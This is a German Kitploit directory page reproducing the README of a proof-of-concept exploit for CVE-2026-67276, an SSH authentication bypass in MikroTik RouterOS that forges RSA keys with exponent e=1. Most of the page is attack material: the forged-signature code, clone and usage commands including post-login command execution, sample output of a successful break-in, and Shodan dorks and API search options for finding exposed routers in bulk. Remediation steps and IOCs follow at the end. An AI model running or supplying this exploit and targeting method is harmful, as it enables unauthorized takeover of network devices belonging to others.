Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
exploit-mikrotik-2026 — CVE-2026-67276 MikroTik RouterOS SSH-Authentifizierungs-Bypass-Exploit | Kitploit
Tools/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
AufklärungSchwachstellenanalyseExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstestsAuthentifizierung
GitHubblackhatexploitation/exploit-mikrotik-2026

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

exploit-mikrotik-2026

CVE-2026-67276 MikroTik RouterOS SSH-Authentifizierungs-Bypass-Exploit

Repository anzeigen
vor 8h 16mNoch nicht geprüft
Teilen

CVE-2026-67276 - MikroTrik SSH-Authentifizierungs-Bypass-Exploit

CVE Severity Type Platform

MikroTik RouterOS SSH-Public-Key-Authentifizierungs-Bypass - Kein privater Schlüssel erforderlich

Ein Proof-of-Concept-Exploit für CVE-2026-67276 (MikroTrick), eine kritische Authentifizierungs-Bypass-Schwachstelle in der SSH-Implementierung von MikroTik RouterOS, die es Angreifern ermöglicht, sich als beliebiger Benutzer zu authentifizieren, ohne dessen privaten Schlüssel zu besitzen.


Inhaltsverzeichnis

  • Übersicht über die Schwachstelle
  • So funktioniert es
  • Betroffene Versionen
  • Installation
  • Verwendung
  • Shodan-Aufklärung
  • Technische Details
  • Behebung
  • Referenzen
  • Haftungsausschluss

Übersicht über die Schwachstelle

Die MikroTrick-Angriffskette

CVE-2026-67276 ist Teil einer größeren Angriffskette namens "MikroTrick", die von CERT PL entdeckt wurde und nachweislich aktiv in freier Wildbahn ausgenutzt wird:


So funktioniert es

Die Schwachstelle

Die SSH-Authentifizierung von RouterOS weist einen kritischen Fehler bei der Validierung öffentlicher Schlüssel auf:

  1. Schlüsselabgleich-Fehler: RouterOS gleicht den präsentierten SSH-Public-Key-Blob gegen autorisierte Schlüssel nur anhand von (Schlüsseltyp, Modulus) ab und lässt den Exponenten vollständig außer Acht
  2. Exponent vom Client: Die Signaturprüfung verwendet den Exponenten aus dem vom Client gelieferten Blob, nicht den gespeicherten Schlüssel
  3. Triviale Fälschung: Das Präsentieren von {ssh-rsa, e=1, n=Opfer_Modulus} macht die Verifizierung trivial

Mathematische Grundlage

root@kitploit:~
Standard-RSA-Verifizierung:  sig^65537 mod n == erwartet  (erfordert privaten Schlüssel)
Ausgenutzte Verifizierung:   sig^1 mod n == sig           (KEIN privater Schlüssel nötig!)

Mit Exponent e=1 wird die Signaturprüfung zu:

root@kitploit:~
sig^1 mod n == sig

Das bedeutet, die "Signatur" ist einfach die EMSA-PKCS1-v1_5-kodierte Nachricht selbst - von jedem konstruierbar, der den öffentlichen Modulus des Opfers kennt.

Angriffsvoraussetzungen

  1. Zielbenutzername eines Kontos mit autorisiertem RSA-Schlüssel
  2. Der RSA-Public-Modulus n dieses autorisierten Schlüssels (aus .pub-Datei, früheren Verbindungen usw.)
  3. Netzwerkzugriff auf den SSH-Port

Betroffene Versionen

ZweigVerwundbarer BereichGepatchte Version
6.x6.0 - 6.49.206.49.21+

Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# Abhängigkeiten installieren
pip install paramiko cryptography

Verwendung

Schnellstart

root@kitploit:~
# Basis-Exploit - generiert Schlüssel automatisch, erkennt Version
python3 full_exploit.py --host 192.168.88.1 --username admin

# Befehl nach Authentifizierung ausführen
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# Benutzerdefinierter Port
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

Verwendung eines vorhandenen öffentlichen Schlüssels

root@kitploit:~
# Wenn Sie die Public-Key-Datei des Opfers haben
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# Oder den Modulus direkt angeben
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

Versionserkennung

Der Exploit erkennt automatisch die RouterOS-Version und prüft den Schwachstellenstatus:

root@kitploit:~
# Exploit auch bei Nicht-MikroTik oder unbekannter Version erzwingen
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

Alle Optionen

root@kitploit:~
--host              Ziel-RouterOS-IP/Hostname (erforderlich)
--port              SSH-Port (Standard: 22)
--username          Ziel-RouterOS-Benutzername (erforderlich)
--pubkey            RSA-Public-Key-Datei (wird automatisch generiert, wenn nicht angegeben)
--modulus-hex       RSA-Modulus als Hex (Alternative zu --pubkey)
--algos             Signaturalgorithmen (Standard: ssh-rsa,rsa-sha2-256)
--exec              Befehl zur Ausführung nach der Authentifizierung
--exp-enc           Exponenten-Kodierung: kanonisch (1 Byte) oder ausgerichtet (3 Bytes)
--timeout           Verbindungs-Timeout (Standard: 15.0 Sekunden)
--skip-version-check    RouterOS-Versionsprüfung überspringen
--shodan-dorks      Shodan-Suchabfragen ausgeben
--shodan-search     Shodan-API nach Zielen durchsuchen
--shodan-key        Shodan-API-Schlüssel
--shodan-query      Benutzerdefinierte Shodan-Abfrage
--shodan-limit      Shodan-Ergebnislimit (Standard: 100)

Shodan-Aufklärung

Dorks ausgeben

root@kitploit:~
python3 full_exploit.py --shodan-dorks

Shodan-API durchsuchen

root@kitploit:~
# Basissuche
python3 full_exploit.py --shodan-search --shodan-key YOUR_API_KEY

# Benutzerdefinierte Abfrage
python3 full_exploit.py --shodan-search --shodan-key YOUR_KEY --shodan-query 'MikroTik port:22 country:US'

Nützliche Shodan-Abfragen


Technische Details

SSH-Public-Key-Blob-Struktur

root@kitploit:~
string    "ssh-rsa"
mpint     e (öffentlicher Exponent)  <- Angreifer liefert e=1
mpint     n (Modulus)                <- Tatsächlicher Modulus des Opfers

Generierung gefälschter Signaturen

root@kitploit:~
# Die "Signatur" ist einfach die EMSA-PKCS1-v1_5-kodierten Auth-Daten
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # Dies IST die gültige Signatur, wenn e=1

Hinweise zum Wire-Format

  • Der innere Typ-String des Blobs bleibt auch bei rsa-sha2-256/512-Algorithmen ssh-rsa
  • Der Signaturalgorithmus steht nur im äußeren Algorithmusfeld
  • Sowohl kanonische (1 Byte) als auch ausgerichtete (3 Byte) e=1-Kodierungen funktionieren auf verwundbaren Versionen

Beispielausgabe

root@kitploit:~
[*] CVE-2026-67276 MikroTrick-Exploit
[*] Ziel: 192.168.88.1:22

[*] RouterOS-Version wird erkannt...
[*] SSH-Banner: SSH-2.0-ROSSSH-7.23.3
[*] RouterOS-Version: 7.23.3
[+] VERSION VERWUNDBAR - CVE-2026-67276 anwendbar

[*] 2048-Bit-RSA-Schlüsselpaar wird generiert...
[+] Privater Schlüssel gespeichert: /path/to/exploit_key
[+] Öffentlicher Schlüssel gespeichert:  /path/to/exploit_key.pub
[*] Modulus: 2048-Bit | gefälscht e=1
[*] Exponenten-Kodierung: kanonisch (01)

[*] Versuche rsa-sha2-256 ...
[+] ALS 'admin' über rsa-sha2-256 AUTHENTIFIZIERT
[+] CVE-2026-67276 BESTÄTIGT - Ziel ist verwundbar
--- Befehlsausgabe ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

Behebung

1. Sofort aktualisieren

root@kitploit:~
# Aktuelle Version prüfen
/system resource print

# Auf gepatchte Version aktualisieren
/system package update download
/system reboot

Mindestversionen mit Sicherheitsupdates:

  • 6.x-Zweig: 6.49.21
  • 7.x stabil: 7.23.4
  • 7.x Testing: 7.24.2

2. SSH deaktivieren, falls nicht erforderlich

root@kitploit:~
/ip service disable ssh

3. SSH-Zugriff einschränken

root@kitploit:~
# Nach IP-Adresse
/ip service set ssh address=192.168.88.0/24

# Firewall-Regel
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. Auf Kompromittierung prüfen

root@kitploit:~
# Auf verdächtige Benutzer prüfen
/user print

# Auf "ops"-Benutzer prüfen (bekannter Angreifer-Indikator)
/user print where name=ops

# Status der Gerätekennzeichnung prüfen
/system/device-mode/print

# Protokolle prüfen
/log print where topics~"ssh"

Bekannte IOCs:

  • Protokolleinträge: login failure for user -2 via ssh
  • Unbekannter privilegierter Benutzer ops
  • "Flagged"-Markierung des Geräts
  • Angreifer-IPs: 82.192.72.4, 103.102.31.18

Referenzen

  • CERT PL Advisory
  • CERT PL CVE-Details
  • MikroTik-Sicherheitsbulletin
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - Verwendung von RSA-Schlüsseln mit SHA-256/512 in SSH
  • RFC 4252 - SSH-Authentifizierungsprotokoll

Haftungsausschluss

⚠️ Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt.

  • Verwenden Sie es nur gegen Systeme, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Testgenehmigung haben
  • Unbefugter Zugriff auf Computersysteme ist gemäß CFAA, Computer Misuse Act und ähnlichen Gesetzen weltweit illegal
  • Die Autoren sind nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Tool verursacht werden
  • Durch die Verwendung dieses Tools stimmen Sie zu, es verantwortungsvoll und legal zu verwenden

Lizenz

MIT-Lizenz - Siehe LICENSE für Details.


Autor

Security-Research-PoC - CVE-2026-67276-Laborimplementierung

Star dieses Repository, wenn Sie es nützlich finden!

Tool herunterladen
DetailInformation
CVE-IDCVE-2026-67276
SchweregradKritisch (CVSS 9.8)
CWECWE-347 (Unzureichende Überprüfung der kryptografischen Signatur)
AngriffsvektorNetzwerk
AuthentifizierungKeine
KomplexitätNiedrig
AuswirkungVollständige Gerätekompromittierung
CVETypBeschreibung
CVE-2026-67276Auth-BypassSSH-Public-Key-Auth-Bypass durch Exponenten-Fälschung
CVE-2026-86060PrivilegieneskalationArgument-Injection über Benutzername
CVE-2026-67279Auth-BypassSSH-Verbindung ohne abgeschlossene Userauth
CVE-2026-67277InformationsoffenlegungKernel-Speicherleck über Bandbreitentest
CVE-2026-67278Signatur-BypassX.509-Akzeptanz fehlerhafter Signaturen
CVE-2026-67281DateilesenWebFig-Root-Dateilesen über jsproxy
7.x stabil
7.0 - 7.23.3
7.23.4+
7.x Testing7.24.0 - 7.24.17.24.2+
ZielAbfrage
Alle MikroTikMikroTik
MikroTik SSHMikroTik port:22
Winbox exponiertport:8291
WebFig-Panelhttp.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
Nach LandMikroTik country:US
SchwachstellenhinweisMikroTik ("6.49" OR "7.23" OR "7.24.0")